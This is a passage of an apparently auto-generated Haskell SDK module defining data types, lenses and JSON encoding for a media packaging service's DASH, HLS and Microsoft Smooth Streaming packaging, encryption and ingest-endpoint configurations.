dpEncryption = lens _dpEncryption (\ s a -> s{_dpEncryption = a})
-- | Minimum duration (in seconds) between potential changes to the Dynamic Adaptive Streaming over HTTP (DASH) Media Presentation Description (MPD).
dpMinUpdatePeriodSeconds :: Lens' DashPackage (Maybe Int)
dpMinUpdatePeriodSeconds = lens _dpMinUpdatePeriodSeconds (\ s a -> s{_dpMinUpdatePeriodSeconds = a})
-- | Duration (in seconds) to delay live content before presentation.
dpSuggestedPresentationDelaySeconds :: Lens' DashPackage (Maybe Int)
dpSuggestedPresentationDelaySeconds = lens _dpSuggestedPresentationDelaySeconds (\ s a -> s{_dpSuggestedPresentationDelaySeconds = a})
-- | Time window (in seconds) contained in each manifest.
dpManifestWindowSeconds :: Lens' DashPackage (Maybe Int)
dpManifestWindowSeconds = lens _dpManifestWindowSeconds (\ s a -> s{_dpManifestWindowSeconds = a})
instance FromJSON DashPackage where
parseJSON
= withObject "DashPackage"
(\ x ->
DashPackage' <$>
(x .:? "minBufferTimeSeconds") <*> (x .:? "profile")
<*> (x .:? "segmentDurationSeconds")
<*> (x .:? "streamSelection")
<*> (x .:? "encryption")
<*> (x .:? "minUpdatePeriodSeconds")
<*> (x .:? "suggestedPresentationDelaySeconds")
<*> (x .:? "manifestWindowSeconds"))
instance Hashable DashPackage where
instance NFData DashPackage where
instance ToJSON DashPackage where
toJSON DashPackage'{..}
= object
(catMaybes
[("minBufferTimeSeconds" .=) <$>
_dpMinBufferTimeSeconds,
("profile" .=) <$> _dpProfile,
("segmentDurationSeconds" .=) <$>
_dpSegmentDurationSeconds,
("streamSelection" .=) <$> _dpStreamSelection,
("encryption" .=) <$> _dpEncryption,
("minUpdatePeriodSeconds" .=) <$>
_dpMinUpdatePeriodSeconds,
("suggestedPresentationDelaySeconds" .=) <$>
_dpSuggestedPresentationDelaySeconds,
("manifestWindowSeconds" .=) <$>
_dpManifestWindowSeconds])
-- | An HTTP Live Streaming (HLS) encryption configuration.
--
-- /See:/ 'hlsEncryption' smart constructor.
data HlsEncryption = HlsEncryption'
{ _heEncryptionMethod :: !(Maybe EncryptionMethod)
, _heKeyRotationIntervalSeconds :: !(Maybe Int)
, _heConstantInitializationVector :: !(Maybe Text)
, _heRepeatExtXKey :: !(Maybe Bool)
, _heSpekeKeyProvider :: !SpekeKeyProvider
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'HlsEncryption' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'heEncryptionMethod' - The encryption method to use.
--
-- * 'heKeyRotationIntervalSeconds' - Interval (in seconds) between each encryption key rotation.
--
-- * 'heConstantInitializationVector' - A constant initialization vector for encryption (optional). When not specified the initialization vector will be periodically rotated.
--
-- * 'heRepeatExtXKey' - When enabled, the EXT-X-KEY tag will be repeated in output manifests.
--
-- * 'heSpekeKeyProvider' - Undocumented member.
hlsEncryption
:: SpekeKeyProvider -- ^ 'heSpekeKeyProvider'
-> HlsEncryption
hlsEncryption pSpekeKeyProvider_ =
HlsEncryption'
{ _heEncryptionMethod = Nothing
, _heKeyRotationIntervalSeconds = Nothing
, _heConstantInitializationVector = Nothing
, _heRepeatExtXKey = Nothing
, _heSpekeKeyProvider = pSpekeKeyProvider_
}
-- | The encryption method to use.
heEncryptionMethod :: Lens' HlsEncryption (Maybe EncryptionMethod)
heEncryptionMethod = lens _heEncryptionMethod (\ s a -> s{_heEncryptionMethod = a})
-- | Interval (in seconds) between each encryption key rotation.
heKeyRotationIntervalSeconds :: Lens' HlsEncryption (Maybe Int)
heKeyRotationIntervalSeconds = lens _heKeyRotationIntervalSeconds (\ s a -> s{_heKeyRotationIntervalSeconds = a})
-- | A constant initialization vector for encryption (optional). When not specified the initialization vector will be periodically rotated.
heConstantInitializationVector :: Lens' HlsEncryption (Maybe Text)
heConstantInitializationVector = lens _heConstantInitializationVector (\ s a -> s{_heConstantInitializationVector = a})
-- | When enabled, the EXT-X-KEY tag will be repeated in output manifests.
heRepeatExtXKey :: Lens' HlsEncryption (Maybe Bool)
heRepeatExtXKey = lens _heRepeatExtXKey (\ s a -> s{_heRepeatExtXKey = a})
-- | Undocumented member.
heSpekeKeyProvider :: Lens' HlsEncryption SpekeKeyProvider
heSpekeKeyProvider = lens _heSpekeKeyProvider (\ s a -> s{_heSpekeKeyProvider = a})
instance FromJSON HlsEncryption where
parseJSON
= withObject "HlsEncryption"
(\ x ->
HlsEncryption' <$>
(x .:? "encryptionMethod") <*>
(x .:? "keyRotationIntervalSeconds")
<*> (x .:? "constantInitializationVector")
<*> (x .:? "repeatExtXKey")
<*> (x .: "spekeKeyProvider"))
instance Hashable HlsEncryption where
instance NFData HlsEncryption where
instance ToJSON HlsEncryption where
toJSON HlsEncryption'{..}
= object
(catMaybes
[("encryptionMethod" .=) <$> _heEncryptionMethod,
("keyRotationIntervalSeconds" .=) <$>
_heKeyRotationIntervalSeconds,
("constantInitializationVector" .=) <$>
_heConstantInitializationVector,
("repeatExtXKey" .=) <$> _heRepeatExtXKey,
Just ("spekeKeyProvider" .= _heSpekeKeyProvider)])
-- | An HTTP Live Streaming (HLS) ingest resource configuration.
--
-- /See:/ 'hlsIngest' smart constructor.
newtype HlsIngest = HlsIngest'
{ _hiIngestEndpoints :: Maybe [IngestEndpoint]
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'HlsIngest' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'hiIngestEndpoints' - A list of endpoints to which the source stream should be sent.
hlsIngest
:: HlsIngest
hlsIngest = HlsIngest' {_hiIngestEndpoints = Nothing}
-- | A list of endpoints to which the source stream should be sent.
hiIngestEndpoints :: Lens' HlsIngest [IngestEndpoint]
hiIngestEndpoints = lens _hiIngestEndpoints (\ s a -> s{_hiIngestEndpoints = a}) . _Default . _Coerce
instance FromJSON HlsIngest where
parseJSON
= withObject "HlsIngest"
(\ x ->
HlsIngest' <$> (x .:? "ingestEndpoints" .!= mempty))
instance Hashable HlsIngest where
instance NFData HlsIngest where
-- | A HTTP Live Streaming (HLS) manifest configuration.
--
-- /See:/ 'hlsManifest' smart constructor.
data HlsManifest = HlsManifest'
{ _hmManifestName :: !(Maybe Text)
, _hmURL :: !(Maybe Text)
, _hmPlaylistType :: !(Maybe PlaylistType)
, _hmProgramDateTimeIntervalSeconds :: !(Maybe Int)
, _hmAdMarkers :: !(Maybe AdMarkers)
, _hmIncludeIframeOnlyStream :: !(Maybe Bool)
, _hmPlaylistWindowSeconds :: !(Maybe Int)
, _hmId :: !Text
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'HlsManifest' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'hmManifestName' - An optional short string appended to the end of the OriginEndpoint URL. If not specified, defaults to the manifestName for the OriginEndpoint.
--
-- * 'hmURL' - The URL of the packaged OriginEndpoint for consumption.
--
-- * 'hmPlaylistType' - The HTTP Live Streaming (HLS) playlist type. When either "EVENT" or "VOD" is specified, a corresponding EXT-X-PLAYLIST-TYPE entry will be included in the media playlist.
--
-- * 'hmProgramDateTimeIntervalSeconds' - The interval (in seconds) between each EXT-X-PROGRAM-DATE-TIME tag inserted into manifests. Additionally, when an interval is specified ID3Timed Metadata messages will be generated every 5 seconds using the ingest time of the content. If the interval is not specified, or set to 0, then no EXT-X-PROGRAM-DATE-TIME tags will be inserted into manifests and no ID3Timed Metadata messages will be generated. Note that irrespective of this parameter, if any ID3 Timed Metadata is found in HTTP Live Streaming (HLS) input, it will be passed through to HLS output.
--
-- * 'hmAdMarkers' - This setting controls how ad markers are included in the packaged OriginEndpoint. "NONE" will omit all SCTE-35 ad markers from the output. "PASSTHROUGH" causes the manifest to contain a copy of the SCTE-35 ad markers (comments) taken directly from the input HTTP Live Streaming (HLS) manifest. "SCTE35_ENHANCED" generates ad markers and blackout tags based on SCTE-35 messages in the input source.
--
-- * 'hmIncludeIframeOnlyStream' - When enabled, an I-Frame only stream will be included in the output.
--
-- * 'hmPlaylistWindowSeconds' - Time window (in seconds) contained in each parent manifest.
--
-- * 'hmId' - The ID of the manifest. The ID must be unique within the OriginEndpoint and it cannot be changed after it is created.
hlsManifest
:: Text -- ^ 'hmId'
-> HlsManifest
hlsManifest pId_ =
HlsManifest'
{ _hmManifestName = Nothing
, _hmURL = Nothing
, _hmPlaylistType = Nothing
, _hmProgramDateTimeIntervalSeconds = Nothing
, _hmAdMarkers = Nothing
, _hmIncludeIframeOnlyStream = Nothing
, _hmPlaylistWindowSeconds = Nothing
, _hmId = pId_
}
-- | An optional short string appended to the end of the OriginEndpoint URL. If not specified, defaults to the manifestName for the OriginEndpoint.
hmManifestName :: Lens' HlsManifest (Maybe Text)
hmManifestName = lens _hmManifestName (\ s a -> s{_hmManifestName = a})
-- | The URL of the packaged OriginEndpoint for consumption.
hmURL :: Lens' HlsManifest (Maybe Text)
hmURL = lens _hmURL (\ s a -> s{_hmURL = a})
-- | The HTTP Live Streaming (HLS) playlist type. When either "EVENT" or "VOD" is specified, a corresponding EXT-X-PLAYLIST-TYPE entry will be included in the media playlist.
hmPlaylistType :: Lens' HlsManifest (Maybe PlaylistType)
hmPlaylistType = lens _hmPlaylistType (\ s a -> s{_hmPlaylistType = a})
-- | The interval (in seconds) between each EXT-X-PROGRAM-DATE-TIME tag inserted into manifests. Additionally, when an interval is specified ID3Timed Metadata messages will be generated every 5 seconds using the ingest time of the content. If the interval is not specified, or set to 0, then no EXT-X-PROGRAM-DATE-TIME tags will be inserted into manifests and no ID3Timed Metadata messages will be generated. Note that irrespective of this parameter, if any ID3 Timed Metadata is found in HTTP Live Streaming (HLS) input, it will be passed through to HLS output.
hmProgramDateTimeIntervalSeconds :: Lens' HlsManifest (Maybe Int)
hmProgramDateTimeIntervalSeconds = lens _hmProgramDateTimeIntervalSeconds (\ s a -> s{_hmProgramDateTimeIntervalSeconds = a})
-- | This setting controls how ad markers are included in the packaged OriginEndpoint. "NONE" will omit all SCTE-35 ad markers from the output. "PASSTHROUGH" causes the manifest to contain a copy of the SCTE-35 ad markers (comments) taken directly from the input HTTP Live Streaming (HLS) manifest. "SCTE35_ENHANCED" generates ad markers and blackout tags based on SCTE-35 messages in the input source.
hmAdMarkers :: Lens' HlsManifest (Maybe AdMarkers)
hmAdMarkers = lens _hmAdMarkers (\ s a -> s{_hmAdMarkers = a})
-- | When enabled, an I-Frame only stream will be included in the output.
hmIncludeIframeOnlyStream :: Lens' HlsManifest (Maybe Bool)
hmIncludeIframeOnlyStream = lens _hmIncludeIframeOnlyStream (\ s a -> s{_hmIncludeIframeOnlyStream = a})
-- | Time window (in seconds) contained in each parent manifest.
hmPlaylistWindowSeconds :: Lens' HlsManifest (Maybe Int)
hmPlaylistWindowSeconds = lens _hmPlaylistWindowSeconds (\ s a -> s{_hmPlaylistWindowSeconds = a})
-- | The ID of the manifest. The ID must be unique within the OriginEndpoint and it cannot be changed after it is created.
hmId :: Lens' HlsManifest Text
hmId = lens _hmId (\ s a -> s{_hmId = a})
instance FromJSON HlsManifest where
parseJSON
= withObject "HlsManifest"
(\ x ->
HlsManifest' <$>
(x .:? "manifestName") <*> (x .:? "url") <*>
(x .:? "playlistType")
<*> (x .:? "programDateTimeIntervalSeconds")
<*> (x .:? "adMarkers")
<*> (x .:? "includeIframeOnlyStream")
<*> (x .:? "playlistWindowSeconds")
<*> (x .: "id"))
instance Hashable HlsManifest where
instance NFData HlsManifest where
-- | A HTTP Live Streaming (HLS) manifest configuration.
--
-- /See:/ 'hlsManifestCreateOrUpdateParameters' smart constructor.
data HlsManifestCreateOrUpdateParameters = HlsManifestCreateOrUpdateParameters'
{ _hmcoupManifestName :: !(Maybe Text)
, _hmcoupPlaylistType :: !(Maybe PlaylistType)
, _hmcoupProgramDateTimeIntervalSeconds :: !(Maybe Int)
, _hmcoupAdMarkers :: !(Maybe AdMarkers)
, _hmcoupIncludeIframeOnlyStream :: !(Maybe Bool)
, _hmcoupPlaylistWindowSeconds :: !(Maybe Int)
, _hmcoupId :: !Text
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'HlsManifestCreateOrUpdateParameters' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'hmcoupManifestName' - An optional short string appended to the end of the OriginEndpoint URL. If not specified, defaults to the manifestName for the OriginEndpoint.
--
-- * 'hmcoupPlaylistType' - The HTTP Live Streaming (HLS) playlist type. When either "EVENT" or "VOD" is specified, a corresponding EXT-X-PLAYLIST-TYPE entry will be included in the media playlist.
--
-- * 'hmcoupProgramDateTimeIntervalSeconds' - The interval (in seconds) between each EXT-X-PROGRAM-DATE-TIME tag inserted into manifests. Additionally, when an interval is specified ID3Timed Metadata messages will be generated every 5 seconds using the ingest time of the content. If the interval is not specified, or set to 0, then no EXT-X-PROGRAM-DATE-TIME tags will be inserted into manifests and no ID3Timed Metadata messages will be generated. Note that irrespective of this parameter, if any ID3 Timed Metadata is found in HTTP Live Streaming (HLS) input, it will be passed through to HLS output.
--
-- * 'hmcoupAdMarkers' - This setting controls how ad markers are included in the packaged OriginEndpoint. "NONE" will omit all SCTE-35 ad markers from the output. "PASSTHROUGH" causes the manifest to contain a copy of the SCTE-35 ad markers (comments) taken directly from the input HTTP Live Streaming (HLS) manifest. "SCTE35_ENHANCED" generates ad markers and blackout tags based on SCTE-35 messages in the input source.
--
-- * 'hmcoupIncludeIframeOnlyStream' - When enabled, an I-Frame only stream will be included in the output.
--
-- * 'hmcoupPlaylistWindowSeconds' - Time window (in seconds) contained in each parent manifest.
--
-- * 'hmcoupId' - The ID of the manifest. The ID must be unique within the OriginEndpoint and it cannot be changed after it is created.
hlsManifestCreateOrUpdateParameters
:: Text -- ^ 'hmcoupId'
-> HlsManifestCreateOrUpdateParameters
hlsManifestCreateOrUpdateParameters pId_ =
HlsManifestCreateOrUpdateParameters'
{ _hmcoupManifestName = Nothing
, _hmcoupPlaylistType = Nothing
, _hmcoupProgramDateTimeIntervalSeconds = Nothing
, _hmcoupAdMarkers = Nothing
, _hmcoupIncludeIframeOnlyStream = Nothing
, _hmcoupPlaylistWindowSeconds = Nothing
, _hmcoupId = pId_
}
-- | An optional short string appended to the end of the OriginEndpoint URL. If not specified, defaults to the manifestName for the OriginEndpoint.
hmcoupManifestName :: Lens' HlsManifestCreateOrUpdateParameters (Maybe Text)
hmcoupManifestName = lens _hmcoupManifestName (\ s a -> s{_hmcoupManifestName = a})
-- | The HTTP Live Streaming (HLS) playlist type. When either "EVENT" or "VOD" is specified, a corresponding EXT-X-PLAYLIST-TYPE entry will be included in the media playlist.
hmcoupPlaylistType :: Lens' HlsManifestCreateOrUpdateParameters (Maybe PlaylistType)
hmcoupPlaylistType = lens _hmcoupPlaylistType (\ s a -> s{_hmcoupPlaylistType = a})
-- | The interval (in seconds) between each EXT-X-PROGRAM-DATE-TIME tag inserted into manifests. Additionally, when an interval is specified ID3Timed Metadata messages will be generated every 5 seconds using the ingest time of the content. If the interval is not specified, or set to 0, then no EXT-X-PROGRAM-DATE-TIME tags will be inserted into manifests and no ID3Timed Metadata messages will be generated. Note that irrespective of this parameter, if any ID3 Timed Metadata is found in HTTP Live Streaming (HLS) input, it will be passed through to HLS output.
hmcoupProgramDateTimeIntervalSeconds :: Lens' HlsManifestCreateOrUpdateParameters (Maybe Int)
hmcoupProgramDateTimeIntervalSeconds = lens _hmcoupProgramDateTimeIntervalSeconds (\ s a -> s{_hmcoupProgramDateTimeIntervalSeconds = a})
-- | This setting controls how ad markers are included in the packaged OriginEndpoint. "NONE" will omit all SCTE-35 ad markers from the output. "PASSTHROUGH" causes the manifest to contain a copy of the SCTE-35 ad markers (comments) taken directly from the input HTTP Live Streaming (HLS) manifest. "SCTE35_ENHANCED" generates ad markers and blackout tags based on SCTE-35 messages in the input source.
hmcoupAdMarkers :: Lens' HlsManifestCreateOrUpdateParameters (Maybe AdMarkers)
hmcoupAdMarkers = lens _hmcoupAdMarkers (\ s a -> s{_hmcoupAdMarkers = a})
-- | When enabled, an I-Frame only stream will be included in the output.
hmcoupIncludeIframeOnlyStream :: Lens' HlsManifestCreateOrUpdateParameters (Maybe Bool)
hmcoupIncludeIframeOnlyStream = lens _hmcoupIncludeIframeOnlyStream (\ s a -> s{_hmcoupIncludeIframeOnlyStream = a})
-- | Time window (in seconds) contained in each parent manifest.
hmcoupPlaylistWindowSeconds :: Lens' HlsManifestCreateOrUpdateParameters (Maybe Int)
hmcoupPlaylistWindowSeconds = lens _hmcoupPlaylistWindowSeconds (\ s a -> s{_hmcoupPlaylistWindowSeconds = a})
-- | The ID of the manifest. The ID must be unique within the OriginEndpoint and it cannot be changed after it is created.
hmcoupId :: Lens' HlsManifestCreateOrUpdateParameters Text
hmcoupId = lens _hmcoupId (\ s a -> s{_hmcoupId = a})
instance Hashable HlsManifestCreateOrUpdateParameters
where
instance NFData HlsManifestCreateOrUpdateParameters
where
instance ToJSON HlsManifestCreateOrUpdateParameters
where
toJSON HlsManifestCreateOrUpdateParameters'{..}
= object
(catMaybes
[("manifestName" .=) <$> _hmcoupManifestName,
("playlistType" .=) <$> _hmcoupPlaylistType,
("programDateTimeIntervalSeconds" .=) <$>
_hmcoupProgramDateTimeIntervalSeconds,
("adMarkers" .=) <$> _hmcoupAdMarkers,
("includeIframeOnlyStream" .=) <$>
_hmcoupIncludeIframeOnlyStream,
("playlistWindowSeconds" .=) <$>
_hmcoupPlaylistWindowSeconds,
Just ("id" .= _hmcoupId)])
-- | An HTTP Live Streaming (HLS) packaging configuration.
--
-- /See:/ 'hlsPackage' smart constructor.
data HlsPackage = HlsPackage'
{ _hpUseAudioRenditionGroup :: !(Maybe Bool)
, _hpPlaylistType :: !(Maybe PlaylistType)
, _hpSegmentDurationSeconds :: !(Maybe Int)
, _hpProgramDateTimeIntervalSeconds :: !(Maybe Int)
, _hpStreamSelection :: !(Maybe StreamSelection)
, _hpAdMarkers :: !(Maybe AdMarkers)
, _hpEncryption :: !(Maybe HlsEncryption)
, _hpIncludeIframeOnlyStream :: !(Maybe Bool)
, _hpPlaylistWindowSeconds :: !(Maybe Int)
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'HlsPackage' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'hpUseAudioRenditionGroup' - When enabled, audio streams will be placed in rendition groups in the output.
--
-- * 'hpPlaylistType' - The HTTP Live Streaming (HLS) playlist type. When either "EVENT" or "VOD" is specified, a corresponding EXT-X-PLAYLIST-TYPE entry will be included in the media playlist.
--
-- * 'hpSegmentDurationSeconds' - Duration (in seconds) of each fragment. Actual fragments will be rounded to the nearest multiple of the source fragment duration.
--
-- * 'hpProgramDateTimeIntervalSeconds' - The interval (in seconds) between each EXT-X-PROGRAM-DATE-TIME tag inserted into manifests. Additionally, when an interval is specified ID3Timed Metadata messages will be generated every 5 seconds using the ingest time of the content. If the interval is not specified, or set to 0, then no EXT-X-PROGRAM-DATE-TIME tags will be inserted into manifests and no ID3Timed Metadata messages will be generated. Note that irrespective of this parameter, if any ID3 Timed Metadata is found in HTTP Live Streaming (HLS) input, it will be passed through to HLS output.
--
-- * 'hpStreamSelection' - Undocumented member.
--
-- * 'hpAdMarkers' - This setting controls how ad markers are included in the packaged OriginEndpoint. "NONE" will omit all SCTE-35 ad markers from the output. "PASSTHROUGH" causes the manifest to contain a copy of the SCTE-35 ad markers (comments) taken directly from the input HTTP Live Streaming (HLS) manifest. "SCTE35_ENHANCED" generates ad markers and blackout tags based on SCTE-35 messages in the input source.
--
-- * 'hpEncryption' - Undocumented member.
--
-- * 'hpIncludeIframeOnlyStream' - When enabled, an I-Frame only stream will be included in the output.
--
-- * 'hpPlaylistWindowSeconds' - Time window (in seconds) contained in each parent manifest.
hlsPackage
:: HlsPackage
hlsPackage =
HlsPackage'
{ _hpUseAudioRenditionGroup = Nothing
, _hpPlaylistType = Nothing
, _hpSegmentDurationSeconds = Nothing
, _hpProgramDateTimeIntervalSeconds = Nothing
, _hpStreamSelection = Nothing
, _hpAdMarkers = Nothing
, _hpEncryption = Nothing
, _hpIncludeIframeOnlyStream = Nothing
, _hpPlaylistWindowSeconds = Nothing
}
-- | When enabled, audio streams will be placed in rendition groups in the output.
hpUseAudioRenditionGroup :: Lens' HlsPackage (Maybe Bool)
hpUseAudioRenditionGroup = lens _hpUseAudioRenditionGroup (\ s a -> s{_hpUseAudioRenditionGroup = a})
-- | The HTTP Live Streaming (HLS) playlist type. When either "EVENT" or "VOD" is specified, a corresponding EXT-X-PLAYLIST-TYPE entry will be included in the media playlist.
hpPlaylistType :: Lens' HlsPackage (Maybe PlaylistType)
hpPlaylistType = lens _hpPlaylistType (\ s a -> s{_hpPlaylistType = a})
-- | Duration (in seconds) of each fragment. Actual fragments will be rounded to the nearest multiple of the source fragment duration.
hpSegmentDurationSeconds :: Lens' HlsPackage (Maybe Int)
hpSegmentDurationSeconds = lens _hpSegmentDurationSeconds (\ s a -> s{_hpSegmentDurationSeconds = a})
-- | The interval (in seconds) between each EXT-X-PROGRAM-DATE-TIME tag inserted into manifests. Additionally, when an interval is specified ID3Timed Metadata messages will be generated every 5 seconds using the ingest time of the content. If the interval is not specified, or set to 0, then no EXT-X-PROGRAM-DATE-TIME tags will be inserted into manifests and no ID3Timed Metadata messages will be generated. Note that irrespective of this parameter, if any ID3 Timed Metadata is found in HTTP Live Streaming (HLS) input, it will be passed through to HLS output.
hpProgramDateTimeIntervalSeconds :: Lens' HlsPackage (Maybe Int)
hpProgramDateTimeIntervalSeconds = lens _hpProgramDateTimeIntervalSeconds (\ s a -> s{_hpProgramDateTimeIntervalSeconds = a})
-- | Undocumented member.
hpStreamSelection :: Lens' HlsPackage (Maybe StreamSelection)
hpStreamSelection = lens _hpStreamSelection (\ s a -> s{_hpStreamSelection = a})
-- | This setting controls how ad markers are included in the packaged OriginEndpoint. "NONE" will omit all SCTE-35 ad markers from the output. "PASSTHROUGH" causes the manifest to contain a copy of the SCTE-35 ad markers (comments) taken directly from the input HTTP Live Streaming (HLS) manifest. "SCTE35_ENHANCED" generates ad markers and blackout tags based on SCTE-35 messages in the input source.
hpAdMarkers :: Lens' HlsPackage (Maybe AdMarkers)
hpAdMarkers = lens _hpAdMarkers (\ s a -> s{_hpAdMarkers = a})
-- | Undocumented member.
hpEncryption :: Lens' HlsPackage (Maybe HlsEncryption)
hpEncryption = lens _hpEncryption (\ s a -> s{_hpEncryption = a})
-- | When enabled, an I-Frame only stream will be included in the output.
hpIncludeIframeOnlyStream :: Lens' HlsPackage (Maybe Bool)
hpIncludeIframeOnlyStream = lens _hpIncludeIframeOnlyStream (\ s a -> s{_hpIncludeIframeOnlyStream = a})
-- | Time window (in seconds) contained in each parent manifest.
hpPlaylistWindowSeconds :: Lens' HlsPackage (Maybe Int)
hpPlaylistWindowSeconds = lens _hpPlaylistWindowSeconds (\ s a -> s{_hpPlaylistWindowSeconds = a})
instance FromJSON HlsPackage where
parseJSON
= withObject "HlsPackage"
(\ x ->
HlsPackage' <$>
(x .:? "useAudioRenditionGroup") <*>
(x .:? "playlistType")
<*> (x .:? "segmentDurationSeconds")
<*> (x .:? "programDateTimeIntervalSeconds")
<*> (x .:? "streamSelection")
<*> (x .:? "adMarkers")
<*> (x .:? "encryption")
<*> (x .:? "includeIframeOnlyStream")
<*> (x .:? "playlistWindowSeconds"))
instance Hashable HlsPackage where
instance NFData HlsPackage where
instance ToJSON HlsPackage where
toJSON HlsPackage'{..}
= object
(catMaybes
[("useAudioRenditionGroup" .=) <$>
_hpUseAudioRenditionGroup,
("playlistType" .=) <$> _hpPlaylistType,
("segmentDurationSeconds" .=) <$>
_hpSegmentDurationSeconds,
("programDateTimeIntervalSeconds" .=) <$>
_hpProgramDateTimeIntervalSeconds,
("streamSelection" .=) <$> _hpStreamSelection,
("adMarkers" .=) <$> _hpAdMarkers,
("encryption" .=) <$> _hpEncryption,
("includeIframeOnlyStream" .=) <$>
_hpIncludeIframeOnlyStream,
("playlistWindowSeconds" .=) <$>
_hpPlaylistWindowSeconds])
-- | An endpoint for ingesting source content for a Channel.
--
-- /See:/ 'ingestEndpoint' smart constructor.
data IngestEndpoint = IngestEndpoint'
{ _ieURL :: !(Maybe Text)
, _ieUsername :: !(Maybe Text)
, _iePassword :: !(Maybe Text)
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'IngestEndpoint' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'ieURL' - The ingest URL to which the source stream should be sent.
--
-- * 'ieUsername' - The system generated username for ingest authentication.
--
-- * 'iePassword' - The system generated password for ingest authentication.
ingestEndpoint
:: IngestEndpoint
ingestEndpoint =
IngestEndpoint'
{_ieURL = Nothing, _ieUsername = Nothing, _iePassword = Nothing}
-- | The ingest URL to which the source stream should be sent.
ieURL :: Lens' IngestEndpoint (Maybe Text)
ieURL = lens _ieURL (\ s a -> s{_ieURL = a})
-- | The system generated username for ingest authentication.
ieUsername :: Lens' IngestEndpoint (Maybe Text)
ieUsername = lens _ieUsername (\ s a -> s{_ieUsername = a})
-- | The system generated password for ingest authentication.
iePassword :: Lens' IngestEndpoint (Maybe Text)
iePassword = lens _iePassword (\ s a -> s{_iePassword = a})
instance FromJSON IngestEndpoint where
parseJSON
= withObject "IngestEndpoint"
(\ x ->
IngestEndpoint' <$>
(x .:? "url") <*> (x .:? "username") <*>
(x .:? "password"))
instance Hashable IngestEndpoint where
instance NFData IngestEndpoint where
-- | A Microsoft Smooth Streaming (MSS) encryption configuration.
--
-- /See:/ 'mssEncryption' smart constructor.
newtype MssEncryption = MssEncryption'
{ _meSpekeKeyProvider :: SpekeKeyProvider
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'MssEncryption' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'meSpekeKeyProvider' - Undocumented member.
mssEncryption
:: SpekeKeyProvider -- ^ 'meSpekeKeyProvider'
-> MssEncryption
mssEncryption pSpekeKeyProvider_ =
MssEncryption' {_meSpekeKeyProvider = pSpekeKeyProvider_}
-- | Undocumented member.
meSpekeKeyProvider :: Lens' MssEncryption SpekeKeyProvider
meSpekeKeyProvider = lens _meSpekeKeyProvider (\ s a -> s{_meSpekeKeyProvider = a})
instance FromJSON MssEncryption where
parseJSON
= withObject "MssEncryption"
(\ x -> MssEncryption' <$> (x .: "spekeKeyProvider"))
instance Hashable MssEncryption where
instance NFData MssEncryption where
instance ToJSON MssEncryption where
toJSON MssEncryption'{..}
= object
(catMaybes
[Just ("spekeKeyProvider" .= _meSpekeKeyProvider)])
-- | A Microsoft Smooth Streaming (MSS) packaging configuration.
--
-- /See:/ 'mssPackage' smart constructor.
data MssPackage = MssPackage'
{ _mpSegmentDurationSeconds :: !(Maybe Int)
, _mpStreamSelection :: !(Maybe StreamSelection)
, _mpEncryption :: !(Maybe MssEncryption)
, _mpManifestWindowSeconds :: !(Maybe Int)
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'MssPackage' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'mpSegmentDurationSeconds' - The duration (in seconds) of each segment.
--
-- * 'mpStreamSelection' - Undocumented member.
--
-- * 'mpEncryption' - Undocumented member.
--
-- * 'mpManifestWindowSeconds' - The time window (in seconds) contained in each manifest.
mssPackage
:: MssPackage
mssPackage =
MssPackage'
{ _mpSegmentDurationSeconds = Nothing
, _mpStreamSelection = Nothing
, _mpEncryption = Nothing
, _mpManifestWindowSeconds = Nothing
}
-- | The duration (in seconds) of each segment.
mpSegmentDurationSeconds :: Lens' MssPackage (Maybe Int)
mpSegmentDurationSeconds = lens _mpSegmentDurationSeconds (\ s a -> s{_mpSegmentDurationSeconds = a})
-- | Undocumented member.
mpStreamSelection :: Lens' MssPackage (Maybe StreamSelection)
mpStreamSelection = lens _mpStreamSelection (\ s a -> s{_mpStreamSelection = a})
-- | Undocumented member.
mpEncryption :: Lens' MssPackage (Maybe MssEncryption)
mpEncryption = lens _mpEncryption (\ s a -> s{_mpEncryption = a})
-- | The time window (in seconds) contained in each manifest.
mpManifestWindowSeconds :: Lens' MssPackage (Maybe Int)
mpManifestWindowSeconds = lens _mpManifestWindowSeconds (\ s a -> s{_mpManifestWindowSeconds = a})
instance FromJSON MssPackage where
parseJSON
= withObject "MssPackage"
(\ x ->
MssPackage' <$>
(x .:? "segmentDurationSeconds") <*>
(x .:? "streamSelection")
<*> (x .:? "encryption")
<*> (x .:? "manifestWindowSeconds"))
instance Hashable MssPackage where
instance NFData MssPackage where
instance ToJSON MssPackage where
toJSON MssPackage'{..}
= object
(catMaybes
[("segmentDurationSeconds" .=) <$>
_mpSegmentDurationSeconds,
("streamSelection" .=) <$> _mpStreamSelection,
("encryption" .=) <$> _mpEncryption,
("manifestWindowSeconds" .=) <$>
_mpManifestWindowSeconds])
-- | An OriginEndpoint resource configuration.
--
-- /See:/ 'originEndpoint' smart constructor.
data OriginEndpoint = OriginEndpoint'
{ _oeWhitelist :: !(Maybe [Text])
, _oeHlsPackage :: !(Maybe HlsPackage)
, _oeARN :: !(Maybe Text)
, _oeManifestName :: !(Maybe Text)
, _oeURL :: !(Maybe Text)
, _oeChannelId :: !(Maybe Text)
, _oeStartoverWindowSeconds :: !(Maybe Int)
, _oeDashPackage :: !(Maybe DashPackage)
, _oeMssPackage :: !(Maybe MssPackage)
, _oeId :: !(Maybe Text)
, _oeTimeDelaySeconds :: !(Maybe Int)
, _oeCmafPackage :: !(Maybe CmafPackage)
, _oeDescription :: !(Maybe Text)
